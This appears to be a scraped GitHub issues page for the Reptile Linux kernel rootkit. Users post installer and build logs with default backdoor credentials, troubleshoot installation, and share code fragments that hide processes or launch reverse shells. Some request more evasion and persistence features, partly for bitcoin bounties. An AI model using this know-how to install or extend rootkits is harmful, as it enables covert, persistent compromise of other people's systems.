f0rb1dd3n / reptile Goto Github PK
View Code? Open in Web Editor NEWLKM Linux rootkit
LKM Linux rootkit
I test on centos that The driver mod don't load when system reboot
reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT ?
Hi, Im a gay ... :)
so, when launch ./installer.sh remove I get this
Uninstalling... rmmod: ERROR: Module rep_mod is in use
Another Info:
On 4.15.0-kali3-amd64
lsmod | grep rep_mod
rep_mod 20480 1
/sbin/modinfo reptile
filename: /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
description: Reptile - A linux LKM rootkit
author: F0rb1dd3n - [email protected]
license: GPL
depends:
retpoline: Y
name: rep_mod
vermagic: 4.15.0-kali3-amd64 SMP mod_unload modversions
rmmod /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
rmmod: ERROR: Module reptile is not currently loaded
How to uninstall please ?
Line 208 in 2f13aac
use copy_to_user/copy_from_user, not __-versions
Line 233 in 2f13aac
Hi, did you want to add my blog post to your list of references?
https://www.google.com.au/search?q="unsigned+int+magic_packet_hook"
Thanks.
Hey, great work! thank you!
But how to unhide content inside tags after it's been inserted?
lsrootkit detects Reptile with a simple GID bruteforcing.
After execute apt-get install linux-headers-$(uname -r),it shows
Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-4.4.0-116-generic is already the newest version (4.4.0-116.140).
0 upgraded, 0 newly installed, 0 to remove and 158 not upgraded.
then I execute ./installer.sh install,it shows
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
writen by: F0rb1dd3n
Compiling... DONE!
Copying binaries to /reptile... DONE!
Installing... insmod: ERROR: could not insert module /reptile/reptile.ko: Invalid module format
ERROR!
Additional information about the system:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
Linus un-exported vfs_read preventing use on 4.14+
I would love to see these features implemented soon:
Hide CPU usage for specified processes : bounty 0.2btc
Hide iptables rules via netfilter hooks - bounty 0.1btc
Execute command at specified time directly via module (not using third party apps like cron) - bounty 0.1btc
Let me know if you are willing to work on this and i will forward my onion contact info.
Hi,
Thanks for the beta version. I tried to compile it on Ubuntu 18.04.1 (64 bit) but I got following error:
: In function 'runshell':
:118:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
/tmp/ccsXzAOl.o: In function runshell': :(.text+0x267): undefined reference to
openpty'
collect2: error: ld returned 1 exit status
Makefile:12: recipe for target 'reverse' failed
make[1]: *** [reverse] Error 1
make[1]: Leaving directory '/home/test/Reptile/sbin'
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
I have an application which processes I can hide with reptile. But it also loads a module which can be found with lsmod and likely other commands. Is there some way to hide the module with reptile?
rt
The TCP and UDP knocking in heaven's door is not working for Centos6 box. Only ICMP knocking works. Could you check what the issue might be? Sebd rootkit raw sockets works for Centos6.
Line 208 in 2f13aac
use copy_to_user/copy_from_user, not __-versions
Hey there, the r00t.c code can be shortened without losing functionality - not sure if that's your style, but I opened a pull request in #5
Also I found some typos and fixed them. By the way, really neat tool you wrote there 👍
Line 200 in 2f13aac
Line 281 in 2f13aac
I like feature of the previous version which you only need to set ip and lport. Input everything in a single run seems to be complicated.
Hello,
I was testing the new remote backdoor (it's very nice) when I encountered this kernel crash (it happens quite quickly after using the remote backdoor). I was using Ubuntu 16.04.4 server (on virtualbox) for testing. Similiar crash also happened on Ubuntu 18.04 server.
Details: crash.txt
Line 120 in 2f13aac
hi, any idea how to fix this problem?
root@test2:/opt/Reptile # ./setup.sh install
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666):
Would you like to config reverse shell each X time? (y/n) (default: n):
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TAGs to hide file contents:
#
content to be hidden
#
Configuring... DONE!
Compiling... mkdir -p bin
cd sbin && make reverse cmd
make[1]: Entering directory '/opt/Reptile/sbin'
make[1]: 'reverse' is up to date.
make[1]: 'cmd' is up to date.
make[1]: Leaving directory '/opt/Reptile/sbin'
make -C /lib/modules/4.11.5-200.fc25.x86_64/build M=$PWD
make[1]: *** /lib/modules/4.11.5-200.fc25.x86_64/build: No such file or directory. Stop.
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
ERROR!
root@test2:/opt/Reptile # yum install kernel-devel
Redirecting to '/usr/bin/dnf install kernel-devel' (see 'man yum2dnf')
Last metadata expiration check: 2:48:28 ago on Thu Dec 6 15:20:15 2018.
Package kernel-devel-4.13.16-100.fc25.x86_64 is already installed, skipping.
Dependencies resolved.
Nothing to do.
Complete!
root@test2:/opt/Reptile # ls -al /lib/modules/4.11.5-200.fc25.x86_64/
total 14380
drwxr-xr-x. 5 root root 4096 Jun 20 2017 .
drwxr-xr-x. 5 root root 4096 Dec 6 18:04 ..
lrwxrwxrwx. 1 root root 39 Jun 14 2017 build -> /usr/src/kernels/4.11.5-200.fc25.x86_64
-rw-r--r--. 1 root root 185270 Jun 14 2017 config
drwxr-xr-x. 13 root root 4096 Jun 20 2017 kernel
-rw-r--r--. 1 root root 974994 Jun 20 2017 modules.alias
-rw-r--r--. 1 root root 955399 Jun 20 2017 modules.alias.bin
-rw-r--r--. 1 root root 1804 Jun 14 2017 modules.block
-rw-r--r--. 1 root root 7554 Jun 14 2017 modules.builtin
-rw-r--r--. 1 root root 9974 Jun 20 2017 modules.builtin.bin
-rw-r--r--. 1 root root 334323 Jun 20 2017 modules.dep
-rw-r--r--. 1 root root 472573 Jun 20 2017 modules.dep.bin
-rw-r--r--. 1 root root 331 Jun 20 2017 modules.devname
-rw-r--r--. 1 root root 153 Jun 14 2017 modules.drm
-rw-r--r--. 1 root root 110 Jun 14 2017 modules.modesetting
-rw-r--r--. 1 root root 2701 Jun 14 2017 modules.networking
-rw-r--r--. 1 root root 126788 Jun 14 2017 modules.order
-rw-r--r--. 1 root root 486 Jun 20 2017 modules.softdep
-rw-r--r--. 1 root root 403343 Jun 20 2017 modules.symbols
-rw-r--r--. 1 root root 493901 Jun 20 2017 modules.symbols.bin
lrwxrwxrwx. 1 root root 5 Jun 14 2017 source -> build
-rw-------. 1 root root 3550927 Jun 14 2017 System.map
drwxr-xr-x. 2 root root 4096 Jun 14 2017 updates
drwxr-xr-x. 2 root root 4096 Jun 20 2017 vdso
-rwxr-xr-x. 1 root root 7137256 Jun 14 2017 vmlinuz
-rw-r--r--. 1 root root 167 Jun 14 2017 .vmlinuz.hmac
root@test2:/opt/Reptile # uname -a
Linux test2 4.11.5-200.fc25.x86_64 #1 SMP Wed Jun 14 17:17:29 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@test2:/opt/Reptile # cat /proc/version
Linux version 4.11.5-200.fc25.x86_64 ([email protected]) (gcc version 6.3.1 20161221 (Red Hat 6.3.1-1) (GCC) ) #1 SMP Wed Jun 14 17:17:29 UTC 2017
root@test2:/opt/Reptile # cat /etc/fedora-release
Fedora release 25 (Twenty Five)
Thanks for your nice work!
I still can't understand how to use the Hiding Files Function.
In readme:
Hide/unhide files contents: kill -51 0 and all content between the tags will be hidden
#
content to hide
#
what i did(use all default setting) :
[root@TEST ~]# cd Reptile
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# # /root/Reptile/README.md #
[root@TEST Reptile]# kill -51 0
[root@TEST Reptile]# kill -51 0 # /root/Reptile/README.md #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# #
[root@TEST Reptile]# /root/Reptile/README.md
-bash: /root/Reptile/README.md: Permission denied
[root@TEST Reptile]# #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]#
i just dont't know how to hide the file /root/Reptile/README.md.
# make
mkdir -p bin
cd sbin && make all
make[1]: Entering directory '/home/user/Desktop/Projects/Reptile/sbin'
gcc -O -W -Wall -o client pel.c aes.c sha1.c client.c
client.c: In function ‘p_error’:
client.c:48:4: warning: ‘strncat’ specified bound 7 equals source length [-Wstringop-overflow=]
strncat(error_message, " Error ", 7);
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc -O -W -Wall -o shell pel.c aes.c sha1.c shell.c -lutil -DLINUX
gcc -Wall r00t.c -o r00t
strip client shell r00t
cp client shell r00t ../bin
make[1]: Leaving directory '/home/user/Desktop/Projects/Reptile/sbin'
make EXTRA_CFLAGS="-Dx86_64" -C /lib/modules/4.17.0-1-ARCH/build M=/home/user/Desktop/Projects/Reptile modules
make[1]: Entering directory '/usr/lib/modules/4.17.0-1-ARCH/build'
CC [M] /home/user/Desktop/Projects/Reptile/rep_mod.o
/home/user/Desktop/Projects/Reptile/rep_mod.c: In function ‘generic_find_sys_call_table’:
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: error: ‘sys_close’ undeclared (first use in this function); did you mean ‘ksys_close’?
if (syscall_table[__NR_close] == (unsigned long)sys_close)
^~~~~~~~~
ksys_close
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: note: each undeclared identifier is reported only once for each function it appears in
make[2]: *** [scripts/Makefile.build:319: /home/user/Desktop/Projects/Reptile/rep_mod.o] Error 1
make[1]: *** [Makefile:1572: _module_/home/user/Desktop/Projects/Reptile] Error 2
make[1]: Leaving directory '/usr/lib/modules/4.17.0-1-ARCH/build'
make: *** [Makefile:7: all] Error 2
Also, from my testing, syscall hooking no longer works in 4.17 so finding a way around that will be fun. Tested the same basic directory hiding code that worked on 4.16.13 on 4.17 and it no longer works.
i use centos 7 for compile the rootkit but i have this error:
Configuring... Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
DONE!
Compiling... ERROR!
Line 174 in 2f13aac
Line 187 in c56224a
Line 317 in 2f13aac
use _dt[sizeof(TOKEN)] while declaring
This is a great design, I want to learn it.Can you tell me how to use it in centos7? Thank you! My kernel is centos7 3.10.0-693.el7.x86_64.What should I do?
uname -a
Linux root 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Compiling Error
`############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to port-knocking (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port to port-knocking (default: 666):
TCP port to port-knocking (default: 80):
UPD port to port-knocking (default: 53):
Hide name: reptile
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TCP port: 80
UDP port: 53
TAGs to hide file contents:
#
content to be hidden
#
Configuring... DONE!
Compiling... ERROR!
`
data = (char *)((unsigned char *)icmp_header + sizeof(struct icmphdr));
data = (char *)((unsigned char *)tcp_header + sizeof(struct tcphdr));
data = (char *)((unsigned char *)udp_header + sizeof(struct udphdr));
skb_header_pointer() must be used along with local on-stack copy of skb->data
portion...
See the example:
https://elixir.bootlin.com/linux/latest/source/net/bridge/netfilter/ebt_ip.c#L36
Hi,
I'm trying to add a hardcoded predefined hidden process name
I'm trying this but It doesn't work
#include <linux/string.h>
static const char* phpn = "process";
in both getdents getdents64:
while(off < ret) {
dir = (void *)kdir + off;
if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0))
|| (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10))))
/* Predefined process check */
|| (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))
{
if(dir == kdir) {
ret -= dir->d_reclen;
memmove(dir, (void *)dir + dir->d_reclen, ret);
continue;
}
prev->d_reclen += dir->d_reclen;
} else {
prev = dir;
}
off += dir->d_reclen;
}
if(copy_to_user(dirent, kdir, ret))
kfree(kdir);
return ret;
}
I was going to add a signal switch next to enable and disable the hiding of predefined process(es)
Tested on CentOS 6 x64 (using all the default setting)
Reptile may have chance to Crash a RHEL6 using all the default setting,sorry a forgot to log the error code.
Good luck!
[test@test ~]$ lsof -i -n -P
lsof: WARNING: unsupported format: /proc/net/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
systemd-n 448 systemd-network 19u IPv4 15693 0t0 UDP 192.168.1.112:68
systemd-r 460 systemd-resolve 12u IPv4 16107 0t0 UDP 127.0.0.53:53
sshd 540 root 4u IPv6 17935 0t0 TCP *:22 (LISTEN)
Tested on Ubuntu 18.04.1 and Debian 9.
Hi,
Could you add another feature to this rootkit so that it can hide its packets from tools like wireshark/tcpdump?
Hello,
Hiding from these commands would be a nice feature.
Add a reverse-root-shell (each X time) - with certificate - using a DGA and/or IP/DOMAIN.
Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.
watching some projects I found this. It would be interesting and helpful to be able to add utility "poison runlevel" for persistence.
Line 460 in c56224a
I get a crash after unloading module looks like memory corruption
"BUG: unable to handle kernel paging request at ffffffffc06e69bb"
It has something to do with file content hiding feature it doesn't crash after commenting all related functions
this is on CentOS 7 3.10.0-693.5.2.el7.x86_64
Hi, thank you for this great project! As I read in other topic, it works only in internal network, but I really need it to use with my vps. How I can setup it to work through NAT? Anyone has experience about that? There is no problem with listener, but server can’t connect to me.
P.s ./reverse works fine. Probably something with magic packet, maybe I used it wrong? I run a web server on my vps, it’s possible to send a packet to Apache and trigger reverse connection?
Line 135 in 2f13aac
rcu_read_lock()
for_each_process() { ... }
rcu_read_unlock()
Or:
read_lock(&tasklist_lock)
for_each_process() { ... }
read_unlock(&tasklist_lock)
Also get_task_struct() required for returning tasks.
See get_pid_task
void shell_execer(struct work_struct *work) {
struct shell_task *task = (struct shell_task *)work;
char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };
exec(argv);
if(task) {
bzero(task->path, strlen(task->path)); <<-- task->path leak
bzero(task->ip, strlen(task->ip)); <<-- task->{ip,port} leak
bzero(task->port, strlen(task->port));
kfree(task);
}
}
You have a nice project, and judging by the stars it has, you should be very proud.
However, I propose the complete removal of this line from the setup.sh
.
It's very much offensive and without adding any value to your project. Don't you agree?
(está dando bobeira aí amigão, de graça).
So, to install on this Centos you just need to run ./setup.sh install
. But before you will have to install String::Unescape perl module.
To do that, normally is just do this command or even cpan -i String::Unescape
. But if you are having problem with that, you will have to check your perl. Maybe in some configurations, perl is not fully installed.
Try to install (or even reinstall) perl and cpan in your system: yum install perl-devel cpan
Is also recommended: yum update
Originally posted by @f0rb1dd3n in #54 (comment)
Line 159 in c56224a
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.